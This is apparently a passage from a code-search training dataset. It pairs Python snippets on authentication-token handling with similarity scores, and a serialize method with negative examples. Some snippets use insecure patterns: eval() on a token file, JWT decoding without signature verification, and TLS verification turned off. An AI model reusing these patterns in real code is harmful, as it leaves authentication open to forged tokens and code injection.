exceptions:\n except Exception:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, \n 400\n )", "def decode(data): #@NoSelf", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired.')\n except jwt.PyJWTError:\n raise serializers.ValidationError('Invalid token')\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token')\n\n self.context['payload'] = payload\n return data", "def tokens_json(self):\n token_id, secret = self.decoded_token\n token_row = self.unauthenticated_token_row\n tokens_encoded = Fernet(secret).decrypt(\n token_row.tokens_fernet.encode('ascii'))\n return json.loads(tokens_encoded.decode('ascii'))", "def __get_authentication_token(self):\n cache = load_json(self._tokenPath)\n return cache[\"authentication_token\"]", "def decode(self, response, request):\n log.debug(\"Decoding authorization.\")\n auth = self._parseAuth(response)\n try:\n self._verifyChallenge(auth[\"challenge\"], request)\n creds = self.buildCredentials(auth, request)\n except KeyError, ke:\n raise LoginFailed(\"{0!r} not in authorization\".format(*ke.args))\n except LoginFailed, lf:\n log.warn(lf)\n raise\n log.debug(\"Decoded credentials: {0}\".format(creds))\n return creds", "def get_token() -> str:\n try:\n bearer, authorization = request.headers['Authorization'].split()\n if 'bearer' not in bearer.lower():\n raise Forbidden('Invalid token. Please login!')\n return authorization\n\n except Exception:\n raise Forbidden('Token is required. Please login!')", "def decode_authorization(authorization: str) -> tuple:\n split = authorization.split(\" \")\n\n if len(split) != 2 or split[0] != \"Basic\":\n raise virtool.errors.AuthError(\"Malformed authorization header\")\n\n decoded = base64.b64decode(split[1]).decode(\"utf-8\")\n\n user_id, key = decoded.split(\":\")\n\n return user_id, key", "def auth_sub_string_from_body(http_body):\n for response_line in http_body.splitlines():\n if response_line.startswith('Token='):\n # Strip off Token= and return the token value string.\n return response_line[6:]\n return None", "def deserialize_tokens():\n\ttry:\n\t\twith open(config.TOKENPATH, \"r+\") as f:\n\t\t\tcontext = f.read()\n\t\t\tres = eval(context)\n\t\t\t# load into memory\n\t\t\treturn res[\"access_token\"], res[\"refresh_token\"]\n\texcept:\n\t\t# unexcept token format\n\t\tfrom common import ApplicationException\n\t\traise ApplicationException(\"authorization file is broken, please run init\")", "def decode_token_service_key(credentials, token, verify=True):\n return _decode_token(credentials, token, verify)", "def decode(self, token, verify=True):\n try:\n return jwt.decode(\n token,\n self.get_verifying_key(token),\n algorithms=[self.algorithm],\n audience=self.audience,\n issuer=self.issuer,\n leeway=self.leeway,\n options={\n 'verify_aud': self.audience is not None,\n 'verify_signature': verify,\n },\n )\n except InvalidAlgorithmError as ex:\n raise TokenBackendError(_('Invalid algorithm specified')) from ex\n except InvalidTokenError:\n raise TokenBackendError(_('Token is invalid or expired'))", "def get_auth_token_teacher():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired')\n except jwt.PyJWTError:\n raise serializers.ValidationError('Invalid token.')\n\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token.')\n\n self.context['payload'] = payload\n return data", "def UserToken(self) -> object:", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected'}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header must start with Bearer'}, 401)\n\n if len(parts) < 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Token not found after Bearer'}, 401)\n\n if len(parts) > 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header is an invalid token structure'}, 401)\n\n return parts[1]", "def verify_jwt(token):\n return jwt.decode(token.encode(), SECRET_KEY)", "def decode_jwt(self, token):\n key = self.master_secret\n public_key = self.public_key\n if self.public_key_file is not None:\n with open(self.public_key_file, 'r') as rsa_pub_file:\n public_key = rsa_pub_file.read()\n if public_key is not None:\n key = public_key\n if self.leeway is not None:\n leeway = self.leeway\n else:\n leeway = 0\n options = {\n 'verify_exp': self.verify_expiration,\n }\n try:\n claims_set = jwt.decode(\n token,\n key,\n options=options,\n leeway=leeway,\n issuer=self.issuer\n )\n except (jwt.DecodeError, jwt.ExpiredSignature):\n return None\n return claims_set", "def parse_token_result(self, res: dict, what: str) -> None:\n if 'error' in res:\n message: str = '{}: {}'.format(what, res['error'].get('message'))\n code: int = int(res['error'].get('code'))\n\n if code == 401:\n raise TokenExpiredError(message, code)\n else:\n raise AuthenticationTokenError(message, code)\n\n self.token = res.get('_TOKEN')\n\n expires_at = res.get('expires-at')\n if expires_at:\n self.expires_at = int(expires_at)\n else:\n expires_in = res.get('expires_in')\n if expires_in:\n self.expires_at = self.get_epoch_millis() + int(expires_in) * 1000\n\n refresh_token = res.get('refresh_token')\n if refresh_token:\n self.refresh_token = refresh_token\n\n self.last_update = self.get_epoch_millis()", "def load_token(token):\n \n #The Token itself was generated by User.get_auth_token. So it is up to \n #us to known the format of the token data itself. \n \n #The Token was encrypted using itsdangerous.URLSafeTimedSerializer which \n #allows us to have a max_age on the token itself. When the cookie is stored\n #on the users computer it also has a exipry date, but could be changed by\n #the user, so this feature allows us to enforce the exipry date of the token\n #server side and not rely on the users cookie to exipre. \n max_age = REMEMBER_COOKIE_DURATION.total_seconds()\n \n #Decrypt the Security Token, data = [username, hashpass]\n data = login_serializer.loads(token, max_age=max_age)\n \n #Find the User\n user = load_user(data[0])\n \n #Check Password and return user or None\n if user and data[1] == user.password:\n return user\n return None", "def jwt_token_verify(auth_header):\n # Hug do not extract Bearer prefix\n auth_token, payload = parse_header(auth_header)\n return payload", "def test_token(self):\r\n expected = \"eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpc3N1ZWRBdCI6ICIyMDE0LTAyLTI3VDE3OjAwOjQyLjQwNjQ0MSswOjAwIiwgImNvbnN1bWVyS2V5IjogImZha2Vfc2VjcmV0IiwgInVzZXJJZCI6ICJ1c2VybmFtZSIsICJ0dGwiOiA4NjQwMH0.Dx1PoF-7mqBOOSGDMZ9R_s3oaaLRPnn6CJgGGF2A5CQ\"\r\n response = retrieve_token(\"username\", \"fake_secret\")\r\n\r\n # because the middle hashes are dependent on time, conly the header and footer are checked for secret key\r\n self.assertEqual(expected.split('.')[0], response.split('.')[0])\r\n self.assertNotEqual(expected.split('.')[2], response.split('.')[2])", "def test_encode_decode_token(create_user):\n user = create_user\n user_data = {\n \"email\": user.email,\n \"username\": user.username\n }\n jwt = JWTAuthentication()\n # encode token\n encoded_token = jwt.generate_token(user_data)\n assert type(encoded_token) is str # test encoding is 'utf-8'\n # decode token\n user_details = jwt.decode_token(encoded_token)\n assert user_details['userdata'] == user_data # test token details", "def get_auth_token_student():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def token(self):\n \n payload = {\n 'sub_type': self.sub_type,\n '_hash' : self._hash,\n 'jti' : str(uuid.uuid4())\n }\n return jwt.encode(payload, self.secret, self.algo).decode('utf-8')", "def get_token_auth_header():\n # Get authorization form request header\n auth = request.headers.get('Authorization', None)\n # Check if authorization header exists\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is MISSING!'\n }, abort(401))\n # If bearer token, then first part of string = 'bearer'\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\"'\n }, abort(401))\n # Authorization header string length must be 2\n elif len(parts) != 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be a BEARER token'\n }, abort(401))\n\n token = parts[1]\n return token", "def decodeAccesshTokenForRefreshToken( accessToken):\n try:\n payload = jwt.decode(accessToken, ApiJWTAuthentication.secretKey_access)\n return {\"message\": \"success\",\"refresh_token\": payload['refresh_token']}\n except jwt.ExpiredSignatureError:\n return {\"message\": \"Expired Access Token\"}\n except jwt.InvalidTokenError:\n return {\"message\": \"Invalid access Token\"}", "def getJWTtoken(self):\n\n token = False\n try:\n res = self.s.get(self.url + 'tokens/jwt', auth=(self.username, self.password), verify=False)\n res.raise_for_status()\n except:\n logger.error(res)\n raise\n token = vsdModels.Token(**res.json())\n try:\n payload = jwt.decode(token.tokenValue, verify=False)\n\n except jwt.InvalidTokenError as e:\n logger.error('token invalid, try using Basic Auth{0}'.format(e))\n raise\n\n return token", "def get_auth_token(cls):\n return jsonify({\n 'user': current_user.serialize(),\n 'token': current_user.get_auth_token(),\n })", "def decoded(self):\n return self._decoded", "def test_token_format(self):\n bearer_token =self.download.get_authorization()\n bearer = bearer_token.split(' ')[0]\n self.assertEqual('Bearer', bearer)", "def _authenticate(self):\n url = self.endpoint + \"/tokens\"\n h = httplib2.Http()\n response, rawcontent = h.request(\n url, \n method=\"POST\",\n headers={ \"Content-Type\":\"application/json\" },\n body=json.dumps(self.credentials()))\n content = json.loads(rawcontent)\n self.token = content['access']['token']['id']\n #TODO: this needs to convert the ISO8601 string to a timestamp\n self.expiration = content['access']['token']['expires']\n self.catalog = content['access']['serviceCatalog']", "def get_client_login_token_string(http_body):\n for response_line in http_body.splitlines():\n if response_line.startswith('Auth='):\n # Strip off the leading Auth= and return the Authorization value.\n return response_line[5:]\n return None", "def test_generate_and_validate_token(self):\n\n audience = 'http://www.service.teletracking.com/'\n roles = {'role': ['admin', 'user'], 'audience': audience}\n secret = 'drMemxWrLen6fCXQA5jO6gXkK/UoZVzPGRDiff7ByPU='\n token = AuthenticationHandler.generate_auth_token(roles, secret)\n decoded_token = AuthenticationHandler.validate_and_decode_token(\n token=token, key=secret,\n audience=audience\n )\n self.assertTrue(decoded_token['role'][0] == 'admin')\n self.assertTrue(decoded_token['role'][1] == 'user')", "def getToken(request):\n try:\n token = request.META['HTTP_AUTHORIZATION'].split()[1]\n except:\n token = \"\"\n return token", "def get_auth_token(self, request: Request, type=\"Bearer\") -> str:\n if \"Authorization\" not in request.headers:\n raise AuthenticationRequiredException\n try:\n auth_type, auth_code = request.headers[\"Authorization\"].split(' ')\n assert auth_type == type\n except Exception:\n raise AuthenticationSchemeInvalidException\n return auth_code", "def _get_auth_string(self):", "def token(self):\n return self[\"token\"]", "def get_token(self, obj):\n jwt_payload_handler = api_settings.JWT_RESPONSE_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(obj)\n token = jwt_encode_handler(payload)\n\n return token", "def verify_auth_token(token):\n serializer = Serializer(SECRET_KEY)\n try:\n data = serializer.loads(token)\n except SignatureExpired:\n return None # valid token, but expired\n except BadSignature:\n return None # invalid token\n return data['token']", "def get_access_token(self, decode: bool = False) -> Union[Dict, str]:\n token = os.environ.get('NEXTCODE_ACCESS_TOKEN') or get_access_token(self.profile.api_key)\n if decode:\n return decode_token(token)\n else:\n return token", "def _requestSwiftToken(self):\n oauth_access_token = self.accessTokenManager.token\n c, r = http._get(\n self.auth_package.HUBIC_API+'account/credentials/',\n headers={\n 'Authorization': 'Bearer '+oauth_access_token\n }\n )\n result = json.loads(r.read())\n c.close()\n\n if r.status != 200:\n try:\n err =result\n err['code'] = r.status\n except Exception as e:\n err = {}\n\n raise Exception(\"Unable to get swift token, \"\n \"(%s)\"%str(err))\n\n self._endpoint = result['endpoint']\n self._token = result['token']\n self._expire = datetime.strptime( result['expires'][:-6], \"%Y-%m-%dT%H:%M:%S\" ) - timedelta(seconds=10)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n return \"authorization_header_missing\"\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n return \"invalid_header\"\n elif len(parts) == 1:\n return \"invalid_header\"\n elif len(parts) > 2:\n return \"invalid_header\"\n\n token = parts[1]\n return token", "def decode_mac_id(self, request, id):\n # There might be multiple secrets in use, if we're in the\n # process of transitioning from one to another. Try each\n # until we find one that works.\n secrets = self._get_token_secrets(request)\n for secret in secrets:\n try:\n data = tokenlib.parse_token(id, secret=secret)\n key = tokenlib.get_token_secret(id, secret=secret)\n break\n except ValueError:\n pass\n else:\n raise ValueError(\"invalid MAC id\")\n return key, data" ]
[ "0.78745645", "0.7660959", "0.76199704", "0.7532894", "0.7487862", "0.7487477", "0.74580514", "0.7387891", "0.73657256", "0.7325584", "0.7293769", "0.72489196", "0.72383934", "0.7121377", "0.7056912", "0.6959151", "0.6953844", "0.69251376", "0.6916667", "0.6878888", "0.6865261", "0.68635124", "0.6850052", "0.6803329", "0.6776945", "0.6770453", "0.67565155", "0.665575", "0.6652748", "0.65494734", "0.6546161", "0.6500037", "0.64749074", "0.6458157", "0.6441215", "0.64403373", "0.6437036", "0.64157397", "0.63937074", "0.63731074", "0.6336809", "0.62740964", "0.6273089", "0.6224306", "0.6204993", "0.6172478", "0.616131", "0.61419666", "0.61323404", "0.61302114", "0.6123681", "0.61142945", "0.6097683", "0.6064958", "0.6063718", "0.60617983", "0.60608995", "0.60512406", "0.604279", "0.60353285", "0.6031607", "0.6015445", "0.60001856", "0.5953301", "0.59458905", "0.59424335", "0.59332514", "0.5928422", "0.59064794", "0.59020805", "0.5896034", "0.5877746", "0.58725977", "0.58643645", "0.586001", "0.5855901", "0.58538514", "0.583202", "0.58300716", "0.58288795", "0.58209044", "0.5818912", "0.5813887", "0.5811596", "0.58099705", "0.5809515", "0.57964164", "0.5793839", "0.5784412", "0.57756764", "0.5765388", "0.5765271", "0.5761787", "0.5761596", "0.57476383", "0.57442415", "0.5736206", "0.5724802", "0.5724706", "0.5721829" ]
0.7564726
3
Returns the Saved news object data in serializable format
def serialize(self): return { "id": self.id, "headline": self.headline, "url": self.url, "image": self.image, "shortDescription": self.shortDescription, "saved": True, "date": self.date, "savedDate": self.savedDate }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialized_data(self):\n return {\n 'id': self.id,\n 'start_time': str(self.start_time),\n 'venue_id': self.venue_id,\n 'venue_name': self.venue.name,\n 'venue_image_link': self.venue.image_link,\n 'artist_id': self.artist_id,\n 'artist_name': self.artist.name,\n 'artist_image_link': self.artist.image_link\n }", "def serialize(self):", "def serialize(self):\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t'title': self.title,\n\t\t\t'year': self.year,\n\t\t\t'artist': self.artist_id,\n\t\t\t'user': self.user_id\n\t\t}", "def serialize(self):\n return {\n 'name' : self.name,\n 'description' : self.description,\n 'id' : self.id,\n 'picture' : self.picture,\n 'catalog_id' : self.catalog_id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'ranking': self.ranking,\n 'created_date': self.created_date,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'description': self.description,\n 'longitude' : self.longitude,\n 'latitude' : self.latitude,\n 'created_on' : self.created_on,\n 'created_by' : self.created_by,\n 'likes' : self.likes\n }", "def serialize(self, data):", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'body': self.body,\n }", "def serialize(self):\n return{\n 'name': self.name,\n 'sport': self.sport,\n 'description': self.description,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'title': self.title,\n 'first_author': self.first_author,\n 'second_author': self.second_author,\n 'publisher': self.publisher,\n 'year_of_publication': self.year_of_publication\n }", "def serialize(self):\n return {\n 'title': self.title,\n 'description': self.description,\n 'id': self.id,\n }", "def saveData(self):\n pass", "def serialize(self):\r\n return {\r\n \"book_id\": self.id,\r\n \"title\": self.title,\r\n \"author\": self.author,\r\n \"category\": self.category,\r\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'desc': self.desc,\n 'category_id': self.category_id,\n }", "def serialized_data(self):\n upcoming_shows = self.upcoming_shows\n past_shows = self.past_shows\n\n return {\n 'id': self.id,\n 'name': self.name,\n 'phone': self.phone,\n 'image_link': self.image_link,\n 'facebook_link': self.facebook_link,\n 'city': self.city.name,\n 'state': self.city.state_name,\n 'num_upcoming_shows': len(upcoming_shows),\n 'upcoming_shows_count': len(upcoming_shows),\n 'upcoming_shows': upcoming_shows,\n 'past_shows': past_shows,\n 'past_shows_count': len(past_shows),\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'cat_id': self.cat_id,\n 'user_id': self.user_id\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date_time' : str(self.date_time),\n 'duration' : self.duration,\n 'highlights' : self.highlights,\n 'conference_id' : self.conference_id,\n 'type_of_session_id' : self.type_of_session_id,\n 'speaker_id' : self.speaker_id,\n 'location_id' : self.location_id,\n 'documents' : self.documents \n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str, \n }", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"detail\": self.detail,\n \"date_on\": self.date_on,\n }", "def serialized_data(self):\n upcoming_shows = self.upcoming_shows\n past_shows = self.past_shows\n\n return {\n 'id': self.id,\n 'name': self.name,\n 'address': self.address,\n 'phone': self.phone,\n 'image_link': self.image_link,\n 'facebook_link': self.facebook_link,\n 'city': self.city.name,\n 'state': self.city.state_name,\n 'genres': self.genres if self.genres else [],\n 'website': self.website,\n 'seeking_description': self.seeking_description,\n 'seeking_talent': self.seeking_talent,\n 'num_upcoming_shows': len(upcoming_shows),\n 'upcoming_shows_count': len(upcoming_shows),\n 'upcoming_shows': upcoming_shows,\n 'past_shows': past_shows,\n 'past_shows_count': len(past_shows),\n }", "def serialize(self):\n return{\n # 'date': self.date,\n 'date': self.date,\n 'id': self.id,\n }", "def save_data(self):\n pass", "def serialize(self):\n return {\n 'id': self.id,\n 'publication_id': self.publication_id,\n 'filename': self.filename,\n 'is_valid_format': self.is_valid_format,\n 'format_validation_message': self.format_validation_message,\n 'is_valid_data': self.is_valid_data,\n 'data_validation_message': self.data_validation_message,\n # 'user_id': self.user_id\n 'user_name': self.user.name\n }", "def serialize(self):\n pass", "def serialize(self):\n return {\n\n\n }", "def serialize(self, data):\n return data", "def dump(self):\n return self._data.dump()", "def serialize(self):\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t'title': self.title,\n\t\t\t'tracknum': self.track_num,\n\t\t\t'video': self.video_id\n\t\t}", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date' : str(self.date),\n 'owner_id' : self.owner_id,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'session_id' : self.session_id,\n 'filename' : self.filename,\n 'filetype' : self.filetype\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'date_added': self.date_added,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'event_url' : self.event_url,\n 'event_thumbnail_url' : self.event_thumbnail_url,\n 'description' : self.description,\n 'ticket_price' : self.ticket_price,\n 'start_date' : str(self.start_date),\n 'featued' : self.featured\n }", "def serialize(self):\n return self.record", "def serialize(self):\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"price\": str(self.price),\n \"description\": self.description,\n \"location\": self.location,\n \"listing_owner\": self.listing_owner,\n \"photos\": [photo.serialize() for photo in self.photos],\n }", "def serialize(self):\r\n return {\r\n 'id': self.id,\r\n 'name': self.name,\r\n 'picture': self.picture,\r\n 'description': self.description,\r\n 'category_slug': self.category_slug}", "def serialize(self, obj):\n return obj", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'owner' : self.user.name,\n 'room' : self.room.name,\n 'description' : self.description,\n 'price' : self.price,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n 'price': self.price,\n 'course': self.course,\n 'restaurant_id': self.restaurant_id\n }", "def serialize(self):\n return {\n 'name' :self.name,\n 'points' :self.pts,\n 'id' :self.id,\n 'league_id':self.league_id,\n 'userID':self.user_id\n }", "def data(self):\n retval = copy.deepcopy(self.__dict__)\n retval[\"_Serializable_classname\"] = type(self).__name__\n retval[\"_Serializable_version\"] = \"1.0\"\n return retval", "def serialize(self, obj):\n pass", "def to_data(self):\n return self.data", "def dumps(self):\n return dumps(self)", "def GetDataAsObject(self):", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'category': self.category\n }", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"currency\": self.currency,\n \"old_price\": self.old_price,\n \"price\": self.price,\n \"availability\": self.availability,\n \"url\": self.url,\n \"img_url\": self.img_url\n }", "def serialize(self):\n return {\n 'item_id': self.item_id,\n 'list_id': self.list_id,\n 'name': self.name,\n 'date_time': dump_datetime(self.date),\n 'amount': self.amount,\n 'bought': self.bought,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n 'price': self.price,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'userID': self.userID,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'category_id': self.category_id,\n }", "def serialize(self):\n return {\n 'name' :self.name,\n 'position':self.position,\n 'id' :self.id,\n 'team_id':self.team_id,\n 'league_id':self.league_id,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'url': self.url,\n 'created': self.created,\n 'update': self.update,\n 'active': self.active,\n }", "def serialize(self):\r\n return {\r\n 'name': self.name,\r\n 'description': self.description,\r\n 'id': self.id,\r\n 'category': self.category_name\r\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def dump(self):\n return json.dumps(self.__data)", "def serialize(self):\n return {\n 'lapyname': self.lapyname,\n 'speciality': self.speciality,\n 'ram': self.ram,\n 'storage': self.storage,\n 'warrenty': self.warrenty,\n 'price': self.price,\n 'rating': self.rating,\n 'date': self.date,\n 'id': self. id\n }", "def get_data(self):\n data = {\n \"ts\": self.drone.pos[0][0],\n \"drone\": self.drone,\n \"subject\": self.subject,\n \"peds\": self.peds, # can be None\n \"objs\": self.objs # can be None\n }\n self.empty_bag()\n return data", "def serialized_data(self):\n return {\n 'id': self.id,\n 'city': self.name,\n 'state': self.state_name\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n }", "def serialize(self):\n return{\n 'name':self.name,\n 'id' :self.id,\n }", "def dump():\n\t\treturn self.__dict__;", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def dumps(self) -> Dict[str, Any]:\n return {\"number\": self.number, \"title\": self.title}", "def dumps(self) -> Dict[str, Any]:\n return {\"name\": self.name, \"date\": self.date}", "def serialize(self):\n return {\n 'list_id': self.list_id,\n 'name': self.name,\n 'date_time': dump_datetime(self.date)\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'description' : self.description,\n 'is_private' : self.is_private,\n }", "def serialize(self):\r\n return {\r\n 'likes': self.likes,\r\n 'dislike': self.dislike,\r\n 'id': self.id\r\n }", "def serialize(self):\n return {\n 'id' : self.id,\n #had to change to 'title' for full calendar, might change\n 'title' : self.name,\n 'host' : self.created_by,\n 'start' : self.start_on.isoformat(),\n 'end' : self.end_on.isoformat(),\n 'description' : self.description,\n 'color' : 'blue',\n }", "def save_news(self, obj_list: List[Tag]) -> str:\n for obj in obj_list:\n header = obj.text.strip()\n if not header:\n if 'alt' in obj.__dict__:\n header = obj.get('alt').strip()\n # other if else\n news = News(\n origin=self.get_self_name(),\n header=header\n )\n news.save()\n return f'Data from service {self.get_self_name()} loaded successfully.'", "def dico_save(self):\r\n\t\tdic = (self.__dict__).copy()\r\n\t\tdel dic['trparas']\r\n\t\tdic.update(self.trparas.dico_save())\r\n\t\treturn dic", "def saveClassroomData():\n with open(\"ClassRoomData.txt\",\"wb\") as classroomData:\n pickle.dump(classroomEntities,classroomData)", "def _serialise(self):\n # TODO (M Foley)\n pass", "def Export(self):\n\n current_time = datetime.datetime.now(tz.UTC)\n\n self.data = np.load(self.cache_path, allow_pickle=True)[()]\n\n news = []\n\n ID = self.data.keys()\n\n for id in ID:\n v = self.data[id]\n if 'address' in v and \"河南\" in v['address'] and v['valid'] == 1\\\n and current_time - parse(v['time']) < datetime.timedelta(hours=12):\n news.append({\"Time\": v['time'], \"address\": v['address'], \"location\": v['location'], \"post\": v['post'],\n \"link\": v[\"link\"]})\n\n with open(self.output_path, \"w\", encoding=\"utf-8\") as fp:\n json.dump(news, fp, ensure_ascii=False, indent=4)\n\n print(\"Export %d info\" % len(news))", "def persistence_serialize(self):\n raise NotImplementedError", "def serialize(self):\n return{\n # 'date': self.date,\n 'q1': self.q1,\n 'q2': self.q2,\n 'q3': self.q3,\n 'q4': self.q4,\n 'finalscore': self.finalscore,\n 'id': self.id,\n }", "def serialize(self):\r\n return {\r\n 'slug': self.slug,\r\n 'title': self.title,\r\n }", "def saveData(self):\n\n data = super(OSSMouthGuide, self).saveData()\n\n # this should live in the GuideClass - also should considere Inherited Types\n data = self.saveAllObjectData(data, \"Control\")\n data = self.saveAllObjectData(data, \"Transform\")\n\n return data", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n 'catalog': self.catalog.serialize,\n }", "def get_save_data(self):\n return {\n 'separator': self.separator,\n 'scanner': None if self.scanner is None else self.scanner.save(),\n 'parser': None if self.parser is None else self.parser.save()\n }", "def serialize(self):\r\n return {\r\n 'id': self.id,\r\n 'name': self.name,\r\n 'email': self.email,\r\n 'phone_number': self.phone_number,\r\n 'spam_likelihood': self.spam_likelihood\r\n }", "def dump(self):\n return {\"data\": self.data, \"encoding\": self.encoding,\n \"type\": self.type_name}", "def get_data(self):\n return self.data.to_json()", "def serialize(self):\n return {\n 'special_messages': self.special_messages,\n 'description': self.description,\n 'name': self.name,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n }", "def serialize (self):\r\n return { 'target': self.target, 'buildDestination': self.buildDestination, \\\r\n 'saveDestination': self.saveDestination, \\\r\n 'storyPanel': self.storyPanel.serialize() }", "def _data_to_save(self) -> SerializedPipelineStorageCollection:\n base_data = super()._base_data_to_save()\n return {\n \"items\": base_data[\"items\"],\n \"preferred_item\": self._preferred_item,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'price': self.price,\n }", "def __repr__(self):\r\n\r\n return f\"<News: id = {self.news_id}, title = {self.title} summary = {self.summary}>\"", "def serialize(self):\n return{\n 'name': self.name,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'email' : self.email,\n 'picture' : self.picture,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n 'price': self.price,\n 'catch_phrase': self.catch_phrase,\n }", "def dump_model(self):", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'phone' : self.phone,\n 'email' : self.email,\n 'address' : self.address,\n 'picture' : self.picture,\n }", "def getData(self):\n return dict(self._dump_data)", "def data(self):\n return self.__dict__", "def dumps(self):\n pass" ]
[ "0.67177093", "0.67075676", "0.66094065", "0.6601732", "0.6585369", "0.6565495", "0.6531196", "0.649494", "0.64723766", "0.64716303", "0.64442974", "0.64352673", "0.6431501", "0.64202684", "0.64165074", "0.64140564", "0.64076835", "0.64070576", "0.6395844", "0.6394233", "0.63878274", "0.63833", "0.6366175", "0.6345943", "0.63291746", "0.6319308", "0.63157916", "0.630657", "0.6305174", "0.629103", "0.62800664", "0.62729317", "0.62590516", "0.6227378", "0.6209122", "0.620724", "0.620418", "0.6177806", "0.6177001", "0.6149564", "0.61478734", "0.6141348", "0.61370635", "0.6131796", "0.6120771", "0.6113255", "0.6109043", "0.6101868", "0.6096252", "0.60874826", "0.60832655", "0.6070097", "0.605734", "0.6044964", "0.6044964", "0.6044964", "0.60419756", "0.6024577", "0.60171604", "0.6016146", "0.60092103", "0.60052264", "0.59978783", "0.59971464", "0.59971464", "0.59957534", "0.5990181", "0.59890527", "0.5988647", "0.5985847", "0.5983392", "0.5981151", "0.5981131", "0.597915", "0.59699357", "0.59679985", "0.59665585", "0.59639996", "0.5957637", "0.5957535", "0.5949314", "0.5946205", "0.5945486", "0.5940272", "0.59402263", "0.59353954", "0.593319", "0.593272", "0.5930174", "0.5930107", "0.5928172", "0.59148824", "0.5914789", "0.5912785", "0.59093237", "0.59010655", "0.59008133", "0.5895996", "0.5894904", "0.5894512" ]
0.6998519
0
This method is responsible for getting the messages to respond with Also covers analytics events for those messages for e.g. click, view
